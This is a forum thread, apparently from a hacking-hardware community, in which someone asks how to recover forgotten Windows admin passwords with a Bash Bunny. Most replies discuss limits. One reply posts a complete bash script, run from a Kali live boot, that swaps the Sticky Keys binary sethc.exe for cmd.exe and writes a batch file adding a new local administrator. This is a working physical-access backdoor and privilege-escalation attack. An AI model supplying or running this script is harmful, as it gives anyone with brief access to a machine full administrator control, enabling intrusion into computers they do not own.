Get Administrative Password from machine

[Acronym]

Hey!

I just ordered a Bash Bunny, and am eager to start playing around with it. I work in the IT world, and a common complaint with new clients is they've forgotten their Windows Admin Passwords. Generally we would just go in there with the well known windows exploit to get that going, however I'm wondering if there was a way to get the bunny to do that faster, and easier.

My question is, not knowing the admin password, and not being able to login to the computer (or being able to log in as only a USER not an admin) is there a way to have the bunny pull the password (or even the hash?)

[Dice]

If you can type it, you can have the bunny do it.

 

However; as the local admin password is encrypted i would not know a way to extract that.

Booting an (unencrypted) disk with any repair disk would reset it; not retrieve it, However, the bunny is unable to do this.

 

[Bigbiz]

Also to extract the hash is not gonna work as the hash files are locked into the computer, even from an admin terminal. im working on a ducky script to extract the hash to crack offline but as you see problems, some research is due.

.

[dennishedgehog]

why not use the Lan turtle and employ snagging creds module?

[NoExecute]

Or, just boot from a Kali Live system, mount the Windows drive.

------------sethcpatch.sh v2 start--------------

#! /bin/bash
# cmd.exe --> sethc.exe copy patch
# Target Windows XP - 10, Windows Server 2k, 2k3, 2k8, utestet på Server 2016
# Version 0.2 - Juni 2018
# By kent j <kent@labet.dk> 

HELP()
{
	echo "Run with patchwin / unpatchwin"
}

PATCH_WIN () 
{ echo "patching windows sethc function...."
sleep 2

mkdir patch
cp sethc.exe patch/sethc.bak
cp cmd.exe patch/cmd.bak
rm sethc.exe
cp cmd.exe sethc.exe
echo "patching done ......"

sleep 2

echo "Writing windows bat file..."
cd patch
touch useradd.bat
echo "net user /add USER PASS" >useradd.bat
echo "net localgroup administratorer USER /add" >>useradd.bat
cd ..

sleep 2

echo "useradd.bat written to c:\windows\system32\patch\useradd.bat"
echo "Run with useradd.bat"
sleep 2
}

UNPATCH_WIN() 
{
echo "unpatch Windows sethc.exe"
sleep 2
rm sethc.exe
rm cmd.exe
cd patch
cp sethc.bak ../sethc.exe
cp cmd.bak ../cmd.exe
cd ..
rm -rf patch
sleep 2
echo "Cleanup ended !"
echo "sethc.exe & cmd.exe back to normal..."
echo "Script terminated... "
}
case $1 in

help) HELP
;;
patchwin) PATCH_WIN
;;
unpatchwin) UNPATCH_WIN
;;
esac

exit 0

-----------------sethcpatch.sh v2 End------------------

just add this to a custom Kali under /opt/tools/local/win (or whereever you like)
Makes your life soo much easier when users are forgettng their passwords :D

For use, copy it to the local windrive and run it.
When in windows terminal, run the bat file.

Log in, and enjoy admin privs :)

/Kent